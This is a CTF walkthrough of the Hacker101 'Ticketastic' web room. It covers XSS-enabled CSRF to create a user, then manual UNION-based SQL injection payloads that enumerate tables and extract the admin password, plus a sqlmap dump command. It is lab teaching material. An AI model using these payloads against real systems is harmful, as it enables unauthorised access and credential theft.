Hero Icon
Resume

CTF Write-up: Ticketastic (Hacker101)

3 mins📅 Aug 22, 2025, 07:30 AM

🧪 Hacker101 CTF | Beginner Room Walkthrough | 2 Flags

🧭 Room Overview

This beginner-level room was a fun and straightforward Capture The Flag (CTF) challenge hosted on Hacker101. With a mix of insecure web practices and basic SQL injections, it provided a great entry-level experience for aspiring ethical hackers. Let's dive into the steps taken to capture both flags!

🔓 FLAG 0 — CSRF & Poor Credential Handling

After launching the demo instance and logging in with default credentials admin/admin, we noticed that when adding a new user, the form sends credentials via a GET request:

GET /newUser?username=user&password=pass&password2=pass

Clearly, passing credentials in a URL is bad practice — but more interestingly, the live version didn’t allow logging in as admin. So how do we add a user without admin credentials?

💡 XSS + CSRF = User Injection

When submitting a support ticket, the application failed to sanitize HTML inputs. This allowed us to inject an XSS payload. However, more importantly, we leveraged this to perform a Cross-Site Request Forgery (CSRF) attack.

We crafted a malicious link to auto-submit a form adding a new user when clicked by the admin (or loaded on their session):

CSRF Exploit Success

🔑 Logging In

After the admin unknowingly added our user via CSRF, we logged in with the credentials:

Username: user1
Password: password1

We gained access and found a ticket titled “Flag Won’t Work” — and inside it, our first flag!

🧠 FLAG 1 — SQL Injection to the Rescue

Inspecting the ticket view URL, we found:

/ticket?id=1

We began testing classic SQL Injection payloads:

🧪 Manual SQL Injection

  • Testing Boolean-based payloads:
    /ticket?id=1 AND 1=1
    /ticket?id=1 AND 1=2
  • Discovering field count:
    /ticket?id=1 ORDER BY 3
  • Union-based injections to enumerate tables:
    /ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()
  • Finding user table columns:
    /ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'
  • Extracting the admin password:
    /ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin'

⚙️ SQLMap Automation

Instead of doing all that manually, we also used SQLMap by capturing the GET request via Burp Suite and saving it as sqlr.txt:

sqlmap -r sqlr.txt --dump

Within minutes, SQLMap dumped the credentials — and just like that, we grabbed our second flag!

📽️ Video Walkthrough

📌 Key Takeaways

  • Never pass credentials via GET parameters — it’s insecure and visible to logs and browser history.
  • Always sanitize inputs — especially those used in queries or displayed in HTML.
  • CSRF can be powerful when combined with admin-access logic.
  • SQLMap is your best friend for quick SQLi testing in beginner CTFs.

📣 Tags

#Hacker101CTF #CTFWriteup #WebSecurity #EthicalHacking #SQLInjection #CSRF #XSS #CTFLearning #BugBounty